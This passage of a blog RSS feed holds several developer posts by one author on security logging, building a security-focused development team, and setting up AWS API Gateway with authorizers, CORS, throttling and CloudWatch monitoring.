&lt;p&gt;Thorough logging and monitoring are essential to the security of your applications. This information is crucial for identifying and stopping attacks against your systems. With proper logging in place, you can identify suspicious activity before an intruder has a chance to access your sensitive data or gain a foothold on your system.&lt;/p&gt;

&lt;h3&gt;
  
  
  References
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://owasp.org/www-project-top-ten/2017/A10_2017-Insufficient_Logging%2526Monitoring"&gt;OWASP Top 10 Project: 10. Insufficient Logging and Monitoring&lt;/a&gt;&lt;br&gt;
&lt;a href="https://owasp.org/www-project-proactive-controls/v3/en/c9-security-logging"&gt;OWASP Proactive Controls&lt;/a&gt;&lt;br&gt;
&lt;a href="https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html"&gt;OWASP Logging Cheat Sheet&lt;/a&gt;&lt;br&gt;
&lt;a href="https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-61r2.pdf"&gt;NIST Computer Incident Response Handling Guide&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
    </item>
    <item>
      <title>Cultivating a Security Focused Development Team</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Mon, 15 Mar 2021 04:09:43 +0000</pubDate>
      <link>https://forem.com/leading-edje/cultivating-a-security-focused-development-team-4g1g</link>
      <guid>https://forem.com/leading-edje/cultivating-a-security-focused-development-team-4g1g</guid>
      <description>&lt;p&gt;"Security is everyone's responsibility." If you've worked in a corporate environment, I'm sure you've heard this phrase before. It usually appears as part of an annual, required security training. Then you spend the next 15 to 30 minutes learning about the dangers of opening files attached to emails and how to avoid common phishing scams. If you're a software developer, chances are you slog through these annual refreshers with mild annoyance, as quickly as possible, so you can get back to your actual work. &lt;/p&gt;

&lt;p&gt;As advanced users of technology, we like to believe we're smart enough to recognize phishing attempts without hearing the same old warnings about not opening .exe files from someone you don't know. But, while developers may be less likely to fall for common social engineering attacks, like phishing, it doesn't mean we can't still make extremely costly security mistakes. With the constant push for faster and faster development cycles, it's easy to get so focused on solving the problem at hand, that little security issues can slip by. Even though the phrase has become a bit of a cliché, it doesn't make it any less true, "Security is everyone's responsibility". So what can you do to help foster an atmosphere of security-first development within your organization?&lt;/p&gt;

&lt;h2&gt;
  
  
  The "Shift-Left" trend
&lt;/h2&gt;

&lt;p&gt;The "shift-left" paradigm has been making it's way through the DevOps community over the past few years. The general idea is to move security to the left on the SDLC timeline by incorporating security controls earlier in the development process. This concept has grown in popularity with the rise of CI/CD practices. &lt;/p&gt;

&lt;p&gt;Personally, I'm not a big fan of the term for a couple of reasons. First, "shift" implies moving something from one place to another. I think the desire to implement security earlier in the process is great, but organizations shouldn't take this to mean they can replace their current security testing with some CI/CD security tools and call it a day. If you do end-of-cycle, pre-production security tests, these still need to happen. You may need to make some modifications to the process if this type of testing causes a bottleneck, but don't let this "shift left" idea lead you to believe you only need to have security checks at a single point in the development process.&lt;/p&gt;

&lt;p&gt;The second issue I have with this concept is the way software vendors have latched onto it, as they always do, to convince you that all you need to implement the "shift left" paradigm in your organization is to integrate their tool into your development workflow. Most of these are some form of static or dynamic code analysis tools. Some of these are probably really good tools, and adding code scanning is an important part of the "shift left" philosophy, but it can't be the only thing you do. &lt;/p&gt;

&lt;p&gt;If you truly want to make this type of shift within your organization, and you absolutely should, it takes much more than a code scanning tool. It requires not only a shift in security controls, but also in the way your organization thinks about security as a whole. Just like DevOps required a shift in the way we think about the intersection of development and operations, DevSecOps requires understanding how security fits into the overall software development process. It requires you to convince your entire team; developers, managers, product owners, designers, QA testers, that security really &lt;em&gt;is&lt;/em&gt; their responsibility.&lt;/p&gt;

&lt;h2&gt;
  
  
  Creating a Security-Rich Atmosphere
&lt;/h2&gt;

&lt;p&gt;If you're looking to foster this type of security-rich environment for your development team, you'll need to get buy-in across your organization. It needs to be clear to everyone, that they are a part of the security team. Likewise, your security engineers need to be made a part of the development team. This can seem like a pretty big shift in roles, but here are some things you can do to start building this type of collaborative relationship:&lt;/p&gt;

&lt;h4&gt;
  
  
  1. Provide secure coding training for your developers.
&lt;/h4&gt;

&lt;p&gt;You need to make sure your developers understand secure coding practices. This is especially important if you're hiring a lot of junior developers. Many of these developers may have very little knowledge of secure coding practices. They may have never heard of a SQL injection or a cross-site scripting attack. They may see patterns established by your senior developers, like parameterized queries, but they may not understand the "why" behind these patterns. Sometime down the road, these developers may stray from the established patterns because they don't understand the reasons they were written that way in the first place. It's essential that all of your developers have a fundamental understanding of secure coding practices.&lt;/p&gt;

&lt;h4&gt;
  
  
  2. Include security engineers in your Agile teams.
&lt;/h4&gt;

&lt;p&gt;I've worked at numerous clients using some form Agile. The Agile teams are usually made up of some combination of developers, architects, BAs, Scrum masters, product owners, QA testers, and graphic designers, but I have yet to work at a client where they include a security engineer as part of the Agile team. This seems like a major missed opportunity, and could prove incredibly valuable for spreading security throughout your organization. As a member of the Agile team, you have someone to answer security questions during planning, and to call out any issues they see before development work even starts on a story. This can help prevent defects and avoid rework. This also helps eliminate the imaginary wall that often separates development teams from the security team within an organization. Working together on a daily basis allows these teams to share knowledge and come up with solutions that prioritize both the business objectives and the security of the organization.&lt;/p&gt;

&lt;h4&gt;
  
  
  3. Identify security champions within your development teams.
&lt;/h4&gt;

&lt;p&gt;If you want to spread security awareness across your teams, it's important to identify individuals who already show a passion for security on your current team. These people can be leaders in the push to foster a security-first attitude. This is especially important if you don't have the ability to insert security engineers into your Agile teams. Provide additional training to these developers, and they'll be able to take on some of the security focus during planning. They can also help mentor more junior developers on secure coding practices.&lt;/p&gt;

&lt;h4&gt;
  
  
  4. Include security scenarios in your automated testing.
&lt;/h4&gt;

&lt;p&gt;If you're doing automated QA testing, consider including security scenarios in these tests. Test input fields for SQL injections and ensure the proper errors are returned, for example. This can be especially helpful for testing common security vulnerabilities in fast-moving continuous deployment projects. This type of automated testing shouldn't take the place of thorough manual testing or penetration tests, but it can provide a good solution for preventing regressions in your code base. If you've included a security engineer on your Agile team, this is a great time for them to collaborate with your automated QA team to figure out which scenarios can be tested this way.&lt;/p&gt;

&lt;h4&gt;
  
  
  5. Require a security-specific code review
&lt;/h4&gt;

&lt;p&gt;This is a big one, and probably my favorite tip for increasing security consciousness within a development team. It does introduce another step into the development workflow, and it may slow things down a little bit, but the benefits can be huge. The idea is that when a developer has a change that's ready to deploy, their code goes through the normal peer review process. This initial review is for code quality; ensuring that best practices and established patterns have been followed. Once this is approved, a second review is required, this review focuses specifically on security issues that might be caused by the change. This reviewer is less worried about the code, and more about the security implications. What is the risk level of the changes made? Is there any PII involved in the change? Are display changes properly scoped so they will only be seen by authorized users? Is any new data being transmitted to a third-party partner? Are any new dependencies being added to the project? Have unit tests been written that thoroughly cover any areas of concern? It may help to identify the primary questions that need to be asked and provide a checklist for reviewers to use. The great thing about this type of review is that it not only helps to catch security bugs before they're released in productions, but it also helps to emphasis to your developers how seriously you take code security, and it provides great learning opportunities to your team. Your developers are forced to consider security during development, the reviewer is required to think through the potential security implications of each change, and when an issue is pointed out, it's an opportunity for the reviewer to share knowledge with the developer.&lt;/p&gt;

&lt;h4&gt;
  
  
  6. Integrate automated tools into the development workflow.
&lt;/h4&gt;

&lt;p&gt;In order to ensure the best security for your applications, you'll need to include some automated tools in your development process. These may include things like static code analysis tools, dynamic code analysis tools, dependency scans, etc. There are both commercial and open-source tools available in each category, and which tools you need will be determined by your own organization's needs. These tools provide additional layers of security to your development pipeline, but they shouldn't be relied on too heavily. I included this tip last for a reason. No matter how many automated tools you throw in the pipeline, they can never compete with the benefits gained by fostering a truly security-focused atmosphere within your organization.&lt;/p&gt;

&lt;p&gt;Shifting a development team to a security-first attitude is no small task. There will undoubtedly be push-back, but as developers, we play a huge role in an organization's digital footprint, and we have a responsibility to ensure that we've done all we can to limit the risk involved in any changes we make. At the same time, our organization has a responsibility to ensure that their developers have the tools and training they need to write secure code. Implementing the tips above is a good starting point for making the shift to a truly security-focused development team.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://res.cloudinary.com/practicaldev/image/fetch/s--SfUhPiEd--/c_limit%2Cf_auto%2Cfl_progressive%2Cq_auto%2Cw_880/https://dev-to-uploads.s3.amazonaws.com/i/5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>security</category>
      <category>devops</category>
    </item>
    <item>
      <title>Getting Started with AWS API Gateway</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Wed, 16 Dec 2020 10:19:34 +0000</pubDate>
      <link>https://forem.com/leading-edje/getting-started-with-aws-api-gateway-18bo</link>
      <guid>https://forem.com/leading-edje/getting-started-with-aws-api-gateway-18bo</guid>
      <description>&lt;p&gt;In my &lt;a href="https://dev.to/leading-edje/what-s-an-api-gateway-and-how-do-you-choose-the-right-one-12pk"&gt;last article&lt;/a&gt;, I talked about what an API gateway is, and some things you should consider when choosing the right gateway solution for your organization. Today, I thought I'd dive a little deeper into one of those solutions, AWS's API Gateway.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why API Gateway?
&lt;/h3&gt;

&lt;p&gt;I've used API Gateway on a few projects, and it's a great option, especially if you're going to be using other AWS services. It provides fine grained control of your API endpoints, giving you a single point of entry for your API. You can define rules for which endpoints point to which services and which users have access to which resources. API Gateway can handle authentication using IAM, Cognito user pools or custom authorization functions. &lt;/p&gt;

&lt;h3&gt;
  
  
  The Drawbacks
&lt;/h3&gt;

&lt;p&gt;Despite all of it's great features, there are a few things about API Gateway that you need to be aware of. One of the biggest drawbacks of API Gateway is also one of it's biggest benefits. Since it's a fully managed service, you don't have to worry about managing the underlying hardware, but that means you also don't have the ability to do any customization or performance tuning.&lt;/p&gt;

&lt;p&gt;There are also some quotas and limits that Amazon imposes on API Gateway that you need to be aware of. For example, you're limited to 600 APIs per account, and 300 routes per API. There's also a throttle of 10,000 requests per second. Some of the limitations can be increased on request, but others can't. Most of the limits are fairly high and probably won't be an issue for most organizations, but they are something you'll need to keep in mind. Checkout the API Gateway docs for the &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/limits.html" rel="noopener noreferrer"&gt;full list of limitations&lt;/a&gt;.&lt;/p&gt;

&lt;h3&gt;
  
  
  Setting Up API Gateway
&lt;/h3&gt;

&lt;p&gt;With that out of the way, let's take a look at how to setup API Gateway. For this example, I've got two Lambdas set up. They're just simple functions that return some static data, but what they do isn't really important for our purposes. We just need something to call from our gateway.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F1ds35ro3uk6rluqgruii.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F1ds35ro3uk6rluqgruii.png" alt="The dummy Lambda functions"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;To get started we first have to choose which type of API we're going to create. There are currently four types to choose from: HTTP API, WebSocket API, REST API, and REST API Private. &lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Faku31w930ofkhgbd4naz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Faku31w930ofkhgbd4naz.png" alt="API Type Options"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;So, what's the difference? We'll start with the easy ones. The WebSocket API obviously stands out on it's own. It would be used when you need a persistent connection to your backend services. This would be good for something like a real-time chat app, or a dashboard that needs to be updated continuously. The only difference between the REST API and the REST API Private is that the latter is only available within a VPC.&lt;/p&gt;

&lt;p&gt;That leaves us with HTTP API and REST API. These are the two that most organizations will be choosing from. The descriptions on the selection screen aren't very useful, but luckily the docs have a page that &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html" rel="noopener noreferrer"&gt;breaks down the differences&lt;/a&gt; between the two. The TL;DR is that the HTTP API is the newer service. It's optimized to provide low-latency integrations with AWS services, and provides support for OAuth 2.0 and OIDC authorization. There's also built-in support for CORS and automatic deployments. The REST API, on the other hand is the older service, and while it doesn't support some of the new features in HTTP, it supports quite a few other features that the HTTP API doesn't support yet. Take a look at the &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-vs-rest.html" rel="noopener noreferrer"&gt;docs&lt;/a&gt; for full details. For this demo, we'll be using the HTTP API.&lt;/p&gt;

&lt;p&gt;To create the API, you can choose to import an OpenAPI 3 definition, if you have one, or you can build it from scratch, which is what we'll do.&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 1: Add Integrations
&lt;/h3&gt;

&lt;p&gt;In the first step, we'll add the integrations with our Lambda functions. You can also integrate with any HTTP endpoint, so we'll throw in an extra integration with a test API just for fun.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ftv88ntevw7gwvi0n65hl.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Ftv88ntevw7gwvi0n65hl.png" alt="Step 1: Add Integrations"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 2: Configure Routes
&lt;/h3&gt;

&lt;p&gt;In step two, we'll add our routes. We'll create four routes in this case: a GET route to hit our &lt;code&gt;users&lt;/code&gt; lambda, GET and POST routes to hit our &lt;code&gt;posts&lt;/code&gt; lambda, and a GET route to hit the &lt;code&gt;photos&lt;/code&gt; HTTP endpoint. You can create as many routes as you need, and each one can hit whichever integration is appropriate. In some cases, you may have one lambda integration for each route, or you may have several routes that all point to the same lambda. You can also specify which methods each endpoint supports. If this was a real application with the normal CRUD functionalities, we might create routes for the GET, POST, PUT and DELETE methods for each endpoint, or we could delegate the responsibility for determining the response to the lambda using an ANY method.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fps9bn3hv2gs4hc1dr59f.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fps9bn3hv2gs4hc1dr59f.png" alt="Step 2: Configure Routes"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 3: Define Stages
&lt;/h3&gt;

&lt;p&gt;Next we'll define the stages for our API. Stages are individual environments that you can deploy your API configuration changes to. We're going to create two stages: dev and prod. We'll turn on the Auto-deploy option for the dev environment, but leave it off for prod. This gives us the chance to test our changes in dev, then manually deploy them to prod once we're satisfied that everything works properly.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fh23dufee8rb6avu5b6vu.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fh23dufee8rb6avu5b6vu.png" alt="Step 3: Define Stages"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Step 4: Review and Create
&lt;/h3&gt;

&lt;p&gt;The final step in the build process just gives you a chance to review your configuration before your API is created. If you see anything that needs to be changed, you can click the edit button for that section to make updates. Everything looks good, so we'll go ahead and hit Create.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F12zmfwh31cfojpyygg17.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F12zmfwh31cfojpyygg17.png" alt="Step 4: Review and Create"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  The Gateway Dashboard
&lt;/h3&gt;

&lt;p&gt;Once our API is created, we're redirected to the Gateway Dashboard.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fhwk2vzwnlrowi75c8yjh.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fhwk2vzwnlrowi75c8yjh.png" alt="The Gateway Dashboard"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;As you can see, we now have access to a lot more configuration options. Let's take a look at a few of these.&lt;/p&gt;

&lt;h3&gt;
  
  
  Authorization
&lt;/h3&gt;

&lt;p&gt;You have the option of adding an authorizer for each method of each endpoint. This fine grained control allows you to specify who has access to which of your services. In this example, we may want to allow anyone to get posts, but only authorized users to create them.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Foj90lfnr32g9q8wun0j1.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Foj90lfnr32g9q8wun0j1.png" alt="Authorization Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Now when we test our endpoints, you can see that the GET /posts method returns the array of posts, while the POST /posts method returns a 403 Forbidden status.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5xnhuh9cewn6oyqmq29r.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5xnhuh9cewn6oyqmq29r.png" alt="Successful GET /posts response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F9xk2vze9e5mu3t4kflfk.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F9xk2vze9e5mu3t4kflfk.png" alt="Failed POST /posts response"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;This section provides several options for authorizing requests. You can use the built-in IAM authorizer, or you can create and attach a new authorizer. Authorizers can be one of two types: JWT authorizers or Lambda authorizers. A JWT authorizer is used in conjunction with OpenID Connect or OAuth 2.0, while a Lambda authorizer allows you to create custom authorization functions. For more details on each type of authorizer check out the &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-access-control.html" rel="noopener noreferrer"&gt;access control section&lt;/a&gt; of the API Gateway documentation.&lt;/p&gt;

&lt;h3&gt;
  
  
  CORS Configuration
&lt;/h3&gt;

&lt;p&gt;Another important feature in API Gateway is the ability to easily configure Cross-Origin Resource Sharing (CORS) settings. CORS is a security feature in browsers that prevents applications from accessing resources from a different domain. If you're API is on a different domain than the clients accessing it, you'll need to enable CORS. In API Gateway, this is as easy as filling in the fields under the CORS section with your desired settings.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5cm8eo4mxwbds8i7payp.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5cm8eo4mxwbds8i7payp.png" alt="CORS Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;If your API is only used by your own applications, you can specify those origins in the Access-Control-Allow-Origin field. If your API is public, you'll need to use the wild-card (*) in this field. For details on each of the fields in this section, take a look at the &lt;a href="https://docs.aws.amazon.com/apigateway/latest/developerguide/http-api-cors.html" rel="noopener noreferrer"&gt;CORS section&lt;/a&gt; of the docs.&lt;/p&gt;

&lt;h3&gt;
  
  
  Throttling
&lt;/h3&gt;

&lt;p&gt;API Gateway allows you to add throttling to your API to prevent things like DDoS attacks or abuse of your resources. There is a built-in 10,000 requests/second limit per region, but you also have the option to add throttling within your API configuration.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Faujrw1dj01d6xkypxgaz.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Faujrw1dj01d6xkypxgaz.png" alt="Throttling Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;From the API Gateway UI, you're able to configure throttling for your entire API for each stage. You can also configure throttling per route, but you'll need to do this through the API or an SDK currently.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fmqwwox162j7t15lmghip.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fmqwwox162j7t15lmghip.png" alt="Throttling Edit View"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Monitoring
&lt;/h3&gt;

&lt;p&gt;The final feature we'll look at is monitoring. This includes the Metrics and Logging sections. Both of these sections contain toggles for turning on or off the features in CloudWatch.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fxdcr5hjjpp2q8xsa8an7.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fxdcr5hjjpp2q8xsa8an7.png" alt="Metrics Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fab7l12g2cl1bd3ypcyds.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fab7l12g2cl1bd3ypcyds.png" alt="Logging Configuration"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Metrics records the activity on your API and allows you to create charts and graphs to help visualize patterns. You can also setup alarms in CloudWatch to notify someone if your metrics reach a certain threshold. For example, if your API returns more than ten 5xx errors in a 5 minute period, an alarm could trigger an email to your DevOps team.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fpddrd8zeadnd5ki9bk36.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fpddrd8zeadnd5ki9bk36.png" alt="CloudWatch Metrics"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Enabling logging will write an entry to your specified log group for every request your API receives.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fiqkoyfcdbr95t9mjrgm2.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2Fiqkoyfcdbr95t9mjrgm2.png" alt="CloudWatch Logging"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;And that's it! We now have a functioning API Gateway with multiple routes, pointing to multiple backend resources. We've enabled authentication on select routes, setup our CORS configuration, and turned on throttling to help protect our resources. And we've enabled monitoring and logging, so we can keep an eye on the health of our API. &lt;/p&gt;

&lt;p&gt;As you can see, API Gateway is super easy to setup, integrates easily with other AWS services, and it's a fully managed service, so there's no hardware to maintain or software to keep up to date. It's a great option if your organization is already using AWS services, or if you need a fully-featured gateway that can be up and running quickly with no hardware setup or maintenance.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://dev.to/leading-edje"&gt;&lt;br&gt;
  &lt;img src="https://media.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fi%2F5uo60qforg9yqdpgzncq.png" alt="Smart EDJE Image"&gt;&lt;br&gt;
&lt;/a&gt;&lt;a&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>aws</category>
      <category>security</category>
      <category>cloud</category>
      <category>microservices</category>
    </item>
    <item>
      <title>What's an API Gateway and How Do You Choose the Right One</title>
      <dc:creator>Andy Kofod</dc:creator>
      <pubDate>Mon, 30 Nov 2020 02:46:39 +0000</pubDate>
      <link>https://forem.com/leading-edje/what-s-an-api-gateway-and-how-do-you-choose-the-right-one-12pk</link>
      <guid>https://forem.com/leading-edje/what-s-an-api-gateway-and-how-do-you-choose-the-right-one-12pk</guid>
      <description>&lt;p&gt;An API Gateway is an essential, and often misunderstood, piece of an organization's API architecture. The massive number of clients that need access to data, from mobile apps to single page applications to IoT devices, have caused an explosion in the number of organizations relying on APIs. There are various types of gateways available, and numerous features provided by each. There's no one-size-fits-all solution, and the correct choice depends on each organization's unique needs.&lt;/p&gt;

&lt;h1&gt;
  
  
  What is an API Gateway?
&lt;/h1&gt;

&lt;p&gt;An API Gateway provides a single point of access to your backend services. Similar to a reverse proxy, it receives all incoming traffic and directs it to the proper service. This provides a layer of abstraction over your backend services, allowing clients to contact a single interface, rather than querying each service individually. But unlike a simple proxy, it can provide a variety of other features to help improve the security, efficiency and monitoring of the API. The image below shows some of the features available in the popular, open-source project, &lt;a href="https://konghq.com/kong/" rel="noopener noreferrer"&gt;Kong Gateway&lt;/a&gt;.&lt;/p&gt;

